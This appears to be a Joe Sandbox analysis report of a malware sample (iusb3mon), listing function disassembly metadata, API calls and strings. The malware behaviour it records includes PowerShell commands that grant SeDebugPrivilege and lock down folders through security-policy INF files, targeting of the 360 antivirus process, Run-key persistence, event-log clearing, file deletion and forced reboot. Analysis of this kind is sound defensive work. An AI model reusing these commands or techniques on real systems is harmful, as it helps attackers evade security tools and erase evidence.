Part of subcall function 06CF5CE6: Process32First.KERNEL32(00000000,?), ref: 06CF5D0F
Part of subcall function 06CF5CE6: Process32Next.KERNEL32(00000000,00000128), ref: 06CF5D2A
Part of subcall function 06CF5CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 06CF5D4F

WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 06CF62D7
WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P,00000000), ref: 06CF62DF
WinExec.KERNEL32(powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA,00000000), ref: 06CF62E7
Sleep.KERNEL32(00001388), ref: 06CF6301
ExitWindowsEx.USER32(00000000,00000000), ref: 06CF6309

Strings

powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P, xrefs: 06CF62DA
C:\Windows\System32\SrpUxNativeSnapIn.dll, xrefs: 06CF62EB
powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'), xrefs: 06CF62D2
360tray.exe, xrefs: 06CF62AA
Microsoft, xrefs: 06CF628F
360Tray.exe, xrefs: 06CF62BB
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 06CF6294
powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA, xrefs: 06CF62E2

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Exec$Process32$CloseCreateExitFirstHandleNextOpenSleepSnapshotToolhelp32Windows
String ID: 360Tray.exe$360tray.exe$C:\Windows\System32\SrpUxNativeSnapIn.dll$Microsoft$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P$powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"')$powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA
API String ID: 3961968786-728021376
Opcode ID: 4d3e80d739b5b25fb95003a759f8fa2e8042c29fa56e85cf29bc04d1d8a9621f
Instruction ID: 6a7df0551b36343df467d051ec2767c0fbc8a61a9088b194ad907c552c29a0f3
Opcode Fuzzy Hash: 4d3e80d739b5b25fb95003a759f8fa2e8042c29fa56e85cf29bc04d1d8a9621f
Instruction Fuzzy Hash: 6AF0B421BB426175A6E033B73C0EE9B2F19DEDAE25710011DFB249A1D0DAC0C14C8171

Function 06CF3C8E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF8FF7: LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,06CF39FA,SeShutdownPrivilege,00000001,?,06CF200F,?), ref: 06CF900F
Part of subcall function 06CF8FF7: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 06CF901F
Part of subcall function 06CF8FF7: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 06CF902A
Part of subcall function 06CF8FF7: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 06CF9035
Part of subcall function 06CF8FF7: LoadLibraryA.KERNEL32(kernel32.dll,?,06CF39FA,SeShutdownPrivilege,00000001,?,06CF200F,?), ref: 06CF903F
Part of subcall function 06CF8FF7: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 06CF904A
Part of subcall function 06CF8FF7: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06CF9092
Part of subcall function 06CF8FF7: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 06CF909A
Part of subcall function 06CF8FF7: CloseHandle.KERNEL32(?), ref: 06CF90A9
Part of subcall function 06CF8FF7: FreeLibrary.KERNEL32(00000000), ref: 06CF90BA
Part of subcall function 06CF8FF7: FreeLibrary.KERNEL32(00000000), ref: 06CF90C5

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06CF3CAC
Process32First.KERNEL32(?,00000128), ref: 06CF3CD5
OpenProcess.KERNEL32(00000001,00000000,?,?,00000128,00000002,00000000), ref: 06CF3CFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 06CF3D07
Process32Next.KERNEL32(?,00000128), ref: 06CF3D17
CloseHandle.KERNEL32(?,?,00000128,?,00000128,00000002,00000000), ref: 06CF3D23

Strings

SeDebugPrivilege, xrefs: 06CF3C99, 06CF3D2B
explorer.exe, xrefs: 06CF3CE0

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$Load$CloseFreeHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: SeDebugPrivilege$explorer.exe
API String ID: 1212985741-2721386251
Opcode ID: c505907197b311d1887b8695ee92356b0f7c87d8a0f7f1ab936cc7ae0b28c8c9
Instruction ID: 67c8f6e0cfb7ab31860e4328a77cba93c800d97d7445b251d9d2b8e660408b8e
Opcode Fuzzy Hash: c505907197b311d1887b8695ee92356b0f7c87d8a0f7f1ab936cc7ae0b28c8c9
Instruction Fuzzy Hash: AA11E572A14219BAFBE0ABB1AD05FDE7BBADF04710F100066F304E51D0DAB09A544AA4

Function 06CF2E2C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF2E31
FindFirstFileA.KERNEL32(?,?), ref: 06CF2EBF
DeleteFileA.KERNEL32(?,?,?,00000001), ref: 06CF2F67
FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06CF2F7F
FindClose.KERNEL32(00000000,?,?,00000001), ref: 06CF2F8E
RemoveDirectoryA.KERNEL32(?,?,?,00000001), ref: 06CF2F97

Part of subcall function 06D04539: __EH_prolog.LIBCMT ref: 06D0453E

Part of subcall function 06CF31FE: __EH_prolog.LIBCMT ref: 06CF3203

Strings

*.*, xrefs: 06CF2E97

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FileFindH_prolog$CloseDeleteDirectoryFirstNextRemove
String ID: *.*
API String ID: 360591376-438819550
Opcode ID: cfc6ff9e37712616f409131c233b9138959c2b66e6482e0b79d1fc1af7a1f0fc
Instruction ID: 82d52e6f8553980c39cccab24be8c0abb3e17dbd14a4cb4a2e5e50c4ee5b0b11
Opcode Fuzzy Hash: cfc6ff9e37712616f409131c233b9138959c2b66e6482e0b79d1fc1af7a1f0fc
Instruction Fuzzy Hash: A541B271D10249AADBD0EBE4DC84EEEB778EF04300F00415AE625E7290DB78DB48DB90

Function 06CF3B39 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

OpenEventLogA.ADVAPI32(00000000,06D17C38), ref: 06CF3B93
ClearEventLogA.ADVAPI32(00000000,00000000), ref: 06CF3BA2
CloseEventLog.ADVAPI32(00000000), ref: 06CF3BA9

Strings

Security, xrefs: 06CF3B4B
Application, xrefs: 06CF3B44
System, xrefs: 06CF3B52

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Event$ClearCloseOpen
String ID: Application$Security$System
API String ID: 1391105993-2169399579
Opcode ID: 870f85c174e8e713ce0adea843d0063253400009b75d28e04ed935516eee5e0f
Instruction ID: f9ba7ff1ce6c5cf766d27989a10b7f810dca40a697136cc84d44f0182b9b66d8
Opcode Fuzzy Hash: 870f85c174e8e713ce0adea843d0063253400009b75d28e04ed935516eee5e0f
Instruction Fuzzy Hash: 9601B570D14A5DBFDBE09F5998547ACBBB4EB00395F404899E609FA340E6344705CFE0

Function 00C1A342 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,00C1A660,?,00000000), ref: 00C1A3DB
GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,00C1A660,?,00000000), ref: 00C1A404
GetACP.KERNEL32(?,?,00C1A660,?,00000000), ref: 00C1A419

Strings

OCP, xrefs: 00C1A396
ACP, xrefs: 00C1A360

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 76a7d058ae3e80091a3a9a76168d06ff6bf7fd9f775e9a6bc98b08c259d41f7d
Instruction ID: 36a3b4a42eb423b5607a3d67736e497e13f08942ebde3b4413c4a69e61b3f71a
Opcode Fuzzy Hash: 76a7d058ae3e80091a3a9a76168d06ff6bf7fd9f775e9a6bc98b08c259d41f7d
Instruction Fuzzy Hash: B621C422642100A6DB348F15C904BDB73A6AB56B64B968474E93AC7124F732EFC1F352

Function 06CF4652 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 06CF4681

Part of subcall function 06CF461E: GetVersionExA.KERNEL32(?), ref: 06CF4638

ShellExecuteExA.SHELL32(0000003C), ref: 06CF46F2
ExitProcess.KERNEL32 ref: 06CF46FE

Strings

runas, xrefs: 06CF46DD
<, xrefs: 06CF46CD

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExecuteExitFileModuleNameProcessShellVersion
String ID: <$runas
API String ID: 984616556-1187129395
Opcode ID: 6e8c6ab7375dd13cdd105a5b4ad2a84719e57eee789760c4ca7e6976399384a1
Instruction ID: e2739897fae8a01db49a9b880281d39188b5aab3ba476f2a52fd15fc1f6d7a32
Opcode Fuzzy Hash: 6e8c6ab7375dd13cdd105a5b4ad2a84719e57eee789760c4ca7e6976399384a1
Instruction Fuzzy Hash: 6B111F72914259AAEFA5DBA5DC09BC9BBB5BB48704F0044A6E308B62D0DBB49648CF14

Function 06CF72F5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 06CF91B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF9216
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 06CF922E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 06CF923E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 06CF924E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 06CF925B
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06CF9268
Part of subcall function 06CF91B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF93F3

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 06CF732E
wsprintfA.USER32 ref: 06CF7343

Strings

%d*%sMHz, xrefs: 06CF733B
~MHz, xrefs: 06CF7313
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 06CF7318

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeInfoLoadSystemwsprintf
String ID: %d*%sMHz$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
API String ID: 3469679427-2169120903
Opcode ID: 913e414282f236277fceeb49923e2bc7e67a3f9e96a5c0d94897f4db05a95cd3
Instruction ID: b8d5d9ea99c5336766f65ac8b59c0522b173f9db8dd87ad1bc5ea1992c0adfb7
Opcode Fuzzy Hash: 913e414282f236277fceeb49923e2bc7e67a3f9e96a5c0d94897f4db05a95cd3
Instruction Fuzzy Hash: D6F0E271D10208BFEB54ABE5DC06EAEBB3DAB08200F004024FF20E6151E6B096148B65

Function 00C1A517 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C10B40: GetLastError.KERNEL32(?,00000008,00C149F0), ref: 00C10B44
Part of subcall function 00C10B40: SetLastError.KERNEL32(00000000,?,00000006,000000FF), ref: 00C10BE6

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00C1A623
IsValidCodePage.KERNEL32(00000000), ref: 00C1A66C
IsValidLocale.KERNEL32(?,00000001), ref: 00C1A67B
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00C1A6C3
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00C1A6E2

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 870811428a835897950bb0f603c1cd2546da9b5f4ce03a0309f448b8e80d465d
Instruction ID: b460e6e67620e884ced90e7932ba8872fbdbbfa85592b6b5664a774bc465927f
Opcode Fuzzy Hash: 870811428a835897950bb0f603c1cd2546da9b5f4ce03a0309f448b8e80d465d
Instruction Fuzzy Hash: E7517E71A02205AFDB10DFA5CC41BFEB7B8BF0A700F184469F915E7191E7709A81EB62

Function 00C19BB3 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C10B40: GetLastError.KERNEL32(?,00000008,00C149F0), ref: 00C10B44
Part of subcall function 00C10B40: SetLastError.KERNEL32(00000000,?,00000006,000000FF), ref: 00C10BE6

GetACP.KERNEL32(?,?,?,?,?,?,00C0E45B,?,?,?,?,?,-00000050,?,?,?), ref: 00C19C74
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00C0E45B,?,?,?,?,?,-00000050,?,?), ref: 00C19C9F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00C19E02

Strings

utf8, xrefs: 00C19D71

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: c71fcc4c23b55e1fee541f7c90eefd613a879a34885f2101700b0af7866f3697
Instruction ID: 93d1fff8d87aa67e7a3237d815455d387b802814b6dffa86300e571530e092f1
Opcode Fuzzy Hash: c71fcc4c23b55e1fee541f7c90eefd613a879a34885f2101700b0af7866f3697
Instruction Fuzzy Hash: FA71C871A00201ABDB24BB75DC62BEA73E8EF47710F144429F956D7181EB74EAC0B691

Function 06D0ABEF Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 06D0B4CB: GetWindowLongA.USER32(?,000000F0), ref: 06D0B4D7

GetKeyState.USER32(00000010), ref: 06D0AC13
GetKeyState.USER32(00000011), ref: 06D0AC1C
GetKeyState.USER32(00000012), ref: 06D0AC25
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 06D0AC3B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
